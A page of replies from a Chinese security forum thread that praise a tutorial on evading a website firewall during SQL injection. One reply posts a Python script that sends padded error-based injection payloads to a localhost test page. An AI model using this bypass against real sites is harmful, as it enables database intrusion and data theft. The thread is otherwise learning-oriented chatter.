用户
搜索
发表于 2016-12-2 10:17:03
使用道具 举报 回复
发表于 2016-12-2 11:18:53
托马斯转完就晕了吧,哈哈,小白大概看懂了,
使用道具 举报 回复
发表于 2016-12-2 11:19:59
这个托马斯玩的漂亮
步子迈的大了,容易扯着蛋
使用道具 举报 回复
发表于 2016-12-2 13:20:02
两种思路很好,学习了
欢迎访问我的博客 https://www.ohlinge.cn
使用道具 举报 回复
发表于 2016-12-2 13:38:47
111111111111111111
使用道具 举报 回复
taro 发表于 2016-12-2 01:51
这样也行?第一个修改文件名?然后注入,网站本身不会判断文件不存在么?这样可以注入?小菜未测试,求楼主 ...

并没有修改文件名 sqlin.php/后面的部分叫PATH_INFO 其实是很常见的用法 比如thinkphp 不都是index.php/home/xxx 这样的么
关于PATH_INFO具体信息可以谷歌一下
使用道具 举报 回复
发表于 2016-12-5 18:46:35
使用道具 举报 回复
发表于 2016-12-5 23:04:16
讲的不错哦,我这种小菜都看懂了.不过既然放出来的话离被封也没多久了吧
使用道具 举报 回复
发表于 2016-12-7 15:15:53
#coding: utf-8
import requests, os
#i = 9990;
url = 'http://localhost:8090/sqlin.php'

def dopost(url, data=''):
        r = requests.post(url, data)
        return r.content

for i in range(9990, 10000):
        payload = {'id':'1 and 1=' + i * '3' + ' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))'}
        #print payload
        ret = dopost(url, payload)
        ret = ''.join(ret)
        if ret.find('网站防火墙') == -1:
                print "done\n" + "\n" + ret
                exit(0)
使用道具 举报 回复
发表于 2016-12-7 15:16:48
xiaoye 发表于 2016-12-7 15:15
#coding: utf-8
import requests, os
#i = 9990;

啦啦啦,写了个py版的,哈哈,亲测可用,再次膜一下海贼牛
使用道具 举报 回复
发表于 2016-12-8 15:59:30
膜拜大牛
使用道具 举报 回复
发表于 2016-12-8 17:12:37
文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!

奖金点评
300思路非常不错,逻辑清晰,内容有很强的实际意义。

Hacking the earth.My Blog:https://isbase.cc
使用道具 举报 回复
发表于 2017-2-27 08:55:53
给力!!!!
使用道具 举报 回复
发表于 2017-11-29 16:54:45
可以可以
使用道具 举报 回复
发表于 2018-9-20 00:35:48
学习一下~
使用道具 举报 回复
12
发新帖
您需要登录后才可以回帖 登录 | 立即注册